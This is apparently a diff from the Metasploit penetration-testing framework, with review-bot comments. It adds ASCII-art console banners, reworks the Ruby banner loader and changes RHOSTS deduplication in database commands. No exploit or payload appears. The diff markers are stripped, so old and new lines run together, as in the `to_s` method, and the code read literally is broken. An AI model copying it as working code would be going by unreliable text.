#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
%clr
|
||||
',
|
||||
|
||||
|
||||
'
|
||||
%clr%whi
|
||||
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
|
||||
EFLAGS: 00010046
|
||||
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
|
||||
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
|
||||
ds: 0018 es: 0018 ss: 0018
|
||||
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
|
||||
|
||||
%bld
|
||||
Stack: 90909090990909090990909090
|
||||
90909090990909090990909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.09090900
|
||||
90909090.90909090.09090900
|
||||
..........................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
ccccccccc.................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
.................ccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
..........................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
%clr
|
||||
|
||||
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
|
||||
Aiee, Killing Interrupt handler
|
||||
%redKernel panic: Attempted to kill the idle task!
|
||||
In swapper task - not syncing
|
||||
%clr
|
||||
',
|
||||
'
|
||||
%clr
|
||||
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
|
||||
%bluMMMMMMMMMMM MMMMMMMMMM%clr
|
||||
%bluMMMN$ vMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
|
||||
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
|
||||
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
|
||||
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
|
||||
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
|
||||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||
%clr
|
||||
',
|
||||
'
|
||||
%clr ######## #
|
||||
################# #
|
||||
###################### #
|
||||
######################### #
|
||||
############################
|
||||
##############################
|
||||
###############################
|
||||
###############################
|
||||
##############################
|
||||
# ######## #
|
||||
%red##%clr %red###%clr #### ##
|
||||
### ###
|
||||
#### ###
|
||||
#### ########## ####
|
||||
####################### ####
|
||||
#################### ####
|
||||
################## ####
|
||||
############ ##
|
||||
######## ###
|
||||
######### #####
|
||||
############ ######
|
||||
######## #########
|
||||
##### ########
|
||||
### #########
|
||||
###### ############
|
||||
#######################
|
||||
# # ### # # ##
|
||||
########################
|
||||
## ## ## ##
|
||||
%clr
|
||||
',
|
||||
%Q{
|
||||
%whi+-------------------------------------------------------+
|
||||
%whi| METASPLOIT by Rapid7 |
|
||||
%whi+---------------------------+---------------------------+
|
||||
%whi| %blu__________________ %whi| |
|
||||
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi|
|
||||
%whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn|______________________\\ %whi|
|
||||
%whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi|
|
||||
%whi| %blu// \\\\ %whi| %grn********************* %whi|
|
||||
%whi+---------------------------+---------------------------+
|
||||
%whi| o O o | %yel\\'\\/\\/\\/'/ %whi|
|
||||
%whi| o O | %yel)%whi======%yel( %whi|
|
||||
%whi| o | %yel.' %whiLOOT %yel'. %whi|
|
||||
%whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi|
|
||||
%whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi|
|
||||
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
|
||||
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
|
||||
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
|
||||
%whi+---------------------------+---------------------------+%clr
|
||||
%clr
|
||||
},]
|
||||
|
||||
|
||||
|
||||
%w{
|
||||
wake-up-neo.txt
|
||||
cow-head.txt
|
||||
r7-metasploit.txt
|
||||
figlet.txt
|
||||
i-heart-shells.txt
|
||||
branded-longhorn.txt
|
||||
cowsay.txt
|
||||
3kom-superhack.txt
|
||||
missile-command.txt
|
||||
null-pointer-deref.txt
|
||||
metasploit-shield.txt
|
||||
ninja.txt
|
||||
workflow.txt
|
||||
}
|
||||
|
||||
#
|
||||
# Returns a random metasploit logo.
|
||||
#
|
||||
|
||||
def self.readfile(fname)
|
||||
base = File.expand_path(File.dirname(__FILE__))
|
||||
pathname = File.join(base, "logos", fname)
|
||||
fdata = "<< Missing banner: #{fname} >>"
|
||||
begin
|
||||
raise ArgumentError unless File.readable?(pathname)
|
||||
raise ArgumentError unless File.stat(pathname).size < 4096
|
||||
fdata = File.open(pathname) {|f| f.read f.stat.size}
|
||||
rescue SystemCallError, ArgumentError
|
||||
nil
|
||||
end
|
||||
return fdata
|
||||
end
|
||||
|
||||
def self.to_s
|
||||
if ENV['GOCOW']
|
||||
case rand(2)
|
||||
case rand(3)
|
||||
when 0
|
||||
Logos[1]
|
||||
self.readfile Logos[1]
|
||||
when 1
|
||||
Logos[5]
|
||||
self.readfile Logos[5]
|
||||
when 2
|
||||
self.readfile Logos[6]
|
||||
end
|
||||
else
|
||||
Logos[rand(Logos.length)]
|
||||
self.readfile Logos[rand(Logos.length)]
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
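Review bot: `readfile` checks `File.readable?(pathname)` and `File.stat(pathname).size < 4096` on the path and then opens the file separately, and every failure, including a banner of 4096 bytes or more, is reported as "<< Missing banner: ... >>". Open the file once, check `f.stat.size` on the handle, and use a distinct message for the size case; the 4096 limit should be a named constant with a comment on why it exists. The comment "Returns a random metasploit logo." now sits above `readfile` instead of `to_s`, and `readfile` itself is undocumented. The `GOCOW` branch still selects by position (`Logos[1]`, `Logos[5]`, `Logos[6]`), which silently changes meaning if the `%w{}` list is reordered; referring to the file names directly would be sturdier.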
@ -205,6 +205,7 @@ class Db
|
|||
mode = :search
|
||||
delete_count = 0
|
||||
|
||||
rhosts = []
|
||||
host_ranges = []
|
||||
search_term = nil
|
||||
|
||||
|
@ -241,7 +242,6 @@ class Db
|
|||
output = args.shift
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
|
||||
|
@ -280,11 +280,6 @@ class Db
|
|||
range.each do |address|
|
||||
host = framework.db.find_or_create_host(:host => address)
|
||||
print_status("Time: #{host.created_at} Host: host=#{host.address}")
|
||||
if set_rhosts
|
||||
# only unique addresses
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
end
|
||||
end
|
||||
end
|
||||
return
|
||||
|
@ -323,7 +318,7 @@ class Db
|
|||
tbl << columns
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
if mode == :delete
|
||||
host.destroy
|
||||
|
@ -344,9 +339,11 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status("Deleted #{delete_count} hosts") if delete_count > 0
|
||||
}
|
||||
##
|
||||
##
|
||||
end
|
||||
|
||||
def cmd_services_help
|
||||
|
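Review bot: `set_rhosts_from_addrs(rhosts.uniq) if set_rhosts` puts the deduplication on the caller, and the same `.uniq` is repeated at each `set_rhosts_from_addrs(...)` call site this patch touches; calling `uniq` once inside `set_rhosts_from_addrs` would keep a future caller from forgetting it. The doubled `##` lines at the end of this hunk look like a whitespace-only change and could be left out of the patch.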
@ -366,10 +363,11 @@ class Db
|
|||
default_columns = ::Mdm::Service.column_names.sort
|
||||
default_columns.delete_if {|v| (v[-2,2] == "id")}
|
||||
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
rhosts = []
|
||||
delete_count = 0
|
||||
search_term = nil
|
||||
search_term = nil
|
||||
|
||||
# option parsing
|
||||
while (arg = args.shift)
|
||||
|
@ -420,7 +418,6 @@ class Db
|
|||
output_file = ::File.expand_path(output_file)
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
|
||||
|
@ -508,7 +505,7 @@ class Db
|
|||
tbl << columns
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
|
||||
if (mode == :delete)
|
||||
|
@ -529,7 +526,7 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status("Deleted #{delete_count} services") if delete_count > 0
|
||||
|
||||
}
|
||||
|
@ -680,6 +677,7 @@ class Db
|
|||
|
||||
host_ranges = []
|
||||
port_ranges = []
|
||||
rhosts = []
|
||||
svcs = []
|
||||
search_term = nil
|
||||
|
||||
|
@ -733,7 +731,6 @@ class Db
|
|||
end
|
||||
when "-R"
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
when "-u","--user"
|
||||
|
@ -828,7 +825,7 @@ class Db
|
|||
end
|
||||
if set_rhosts
|
||||
addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
creds_returned += 1
|
||||
end
|
||||
|
@ -842,7 +839,7 @@ class Db
|
|||
print_status("Wrote services to #{output_file}")
|
||||
end
|
||||
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
|
||||
}
|
||||
end
|
||||
|
@ -873,6 +870,7 @@ class Db
|
|||
set_rhosts = false
|
||||
|
||||
host_ranges = []
|
||||
rhosts = []
|
||||
search_term = nil
|
||||
|
||||
while (arg = args.shift)
|
||||
|
@ -896,7 +894,6 @@ class Db
|
|||
types = typelist.strip().split(",")
|
||||
when '-R','--rhosts'
|
||||
set_rhosts = true
|
||||
rhosts = []
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
when '-h','--help'
|
||||
|
@ -954,7 +951,7 @@ class Db
|
|||
msg << " host=#{note.host.address}"
|
||||
if set_rhosts
|
||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
||||
rhosts << addr unless rhosts.include?(addr)
|
||||
rhosts << addr
|
||||
end
|
||||
end
|
||||
if (note.service)
|
||||
|
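Review bot: `addr` is built from a bare `host` (`host.scope ? host.address + '%' + host.scope : host.address`), while the line just above reads `note.host.address`. No assignment to a local `host` is visible in this hunk, so if none is in scope at this point `-R` raises a NameError, and if one is left over from an enclosing scope the wrong address lands in RHOSTS. Use `note.host` here, as the `msg <<` line does.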
@ -971,7 +968,7 @@ class Db
|
|||
|
||||
# Finally, handle the case where the user wants the resulting list
|
||||
# of hosts to go into RHOSTS.
|
||||
set_rhosts_from_addrs(rhosts) if set_rhosts
|
||||
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
|
||||
|
||||
print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
|
||||
}
|
||||
|
@ -1476,7 +1473,7 @@ class Db
|
|||
print_error("The database is not connected")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Purging and rebuilding the module cache in the background...")
|
||||
framework.threads.spawn("ModuleCacheRebuild", true) do
|
||||
framework.db.purge_all_module_details
|
||||
|
@ -1707,4 +1704,3 @@ end
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld3Kom SuperHack II Logon%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| User Name: [ %redsecurity%clr ] |
|
||||
| |
|
||||
| Password: [ ] |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| %bld[ OK ]%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| http://metasploit.pro |
|
||||
|______________________________________________________________________________|%clr
|
|
@ -0,0 +1,9 @@
|
|||
, ,
|
||||
/ \
|
||||
((__---,,,---__))
|
||||
(_) O O (_)_________
|
||||
\ _ / |\
|
||||
o_o \ M S F | \
|
||||
\ _____ | *
|
||||
||| WW|||
|
||||
||| |||
|
|
@ -0,0 +1,16 @@
|
|||
%whi
|
||||
_---------.
|
||||
.' ####### ;."
|
||||
.---,. ;@ @@`; .---,..
|
||||
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
|
||||
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
|
||||
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
|
||||
"--'.@@@ -.@ @ ,'- .'--"
|
||||
".@' ; @ @ `. ;'
|
||||
|@@@@ @@@ @ .
|
||||
' @@@ @@ @@ ,
|
||||
`.@@@@ @@ .
|
||||
',@@ @ ; _____________
|
||||
( 3 C ) /|___ / Metasploit! \
|
||||
;@'. __*__,." \|--- \_____________/
|
||||
'(.,...."/%clr
|
|
@ -0,0 +1,8 @@
|
|||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
|
@ -0,0 +1,6 @@
|
|||
_ _
|
||||
/ \ /\ __ _ __ /_/ __
|
||||
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
|
||||
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|
||||
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|
||||
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
|
|
@ -0,0 +1,8 @@
|
|||
%whiIIIIII %reddTb.dTb%clr _.---._
|
||||
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
|
||||
%whi II %red6. .P%clr : .' / | \ `. :
|
||||
%whi II %red'T;. .;P'%clr '.' / | \ `.'
|
||||
%whi II %red'T; ;P'%clr `. / | \ .'
|
||||
%whiIIIIII %red'YvP'%clr `-.__|__.-'
|
||||
|
||||
I love shells --egypt
|
|
@ -0,0 +1,21 @@
|
|||
%clr
|
||||
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
|
||||
%bluMMMMMMMMMMM MMMMMMMMMM%clr
|
||||
%bluMMMN$ vMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
|
||||
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
|
||||
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
|
||||
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
|
||||
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
|
||||
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
|
||||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||
%clr%bld http://metasploit.pro
|
|
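Review bot: the last line of this banner, `%clr%bld http://metasploit.pro`, turns bold on and never resets it, unlike the other banners added in this commit, which end with `%clr`. Append `%clr` so the attribute does not leak into whatever the console prints after the banner.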
@ -0,0 +1,30 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr %yel/%clr + %yel/%clr
|
||||
%yel\%clr + %yel/%clr %yel/%clr
|
||||
* %yel/%clr %yel/%clr
|
||||
%yel/%clr . %yel/%clr
|
||||
X %yel/%clr %yel/%clr X
|
||||
%yel/%clr %red###%clr
|
||||
%yel/%clr %red# %bld%%clr%red #%clr
|
||||
%yel/%clr %red###%clr
|
||||
. %yel/%clr
|
||||
. %yel/%clr . %red*%clr .
|
||||
%yel/%clr
|
||||
*
|
||||
+ %red*%clr
|
||||
|
||||
%bld^%clr
|
||||
#### __ __ __ ####### __ __ __ ####
|
||||
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
http://metasploit.pro%clr
|
|
@ -0,0 +1,30 @@
|
|||
%clr ######## #
|
||||
################# #
|
||||
###################### #
|
||||
######################### #
|
||||
############################
|
||||
##############################
|
||||
###############################
|
||||
###############################
|
||||
##############################
|
||||
# ######## #
|
||||
%red##%clr %red###%clr #### ##
|
||||
### ###
|
||||
#### ###
|
||||
#### ########## ####
|
||||
####################### ####
|
||||
#################### ####
|
||||
################## ####
|
||||
############ ##
|
||||
######## ###
|
||||
######### #####
|
||||
############ ######
|
||||
######## #########
|
||||
##### ########
|
||||
### #########
|
||||
###### ############
|
||||
#######################
|
||||
# # ### # # ##
|
||||
########################
|
||||
## ## ## ##
|
||||
http://metasploit.pro%clr
|
|
@ -0,0 +1,37 @@
|
|||
%clr%whi
|
||||
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
|
||||
EFLAGS: 00010046
|
||||
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
|
||||
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
|
||||
ds: 0018 es: 0018 ss: 0018
|
||||
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
|
||||
|
||||
%bld
|
||||
Stack: 90909090990909090990909090
|
||||
90909090990909090990909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.09090900
|
||||
90909090.90909090.09090900
|
||||
..........................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
ccccccccc.................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
.................ccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
..........................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
%clr
|
||||
|
||||
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
|
||||
Aiee, Killing Interrupt handler
|
||||
%redKernel panic: Attempted to kill the idle task!
|
||||
In swapper task - not syncing%clr
|
Some files were not shown because too many files have changed in this diff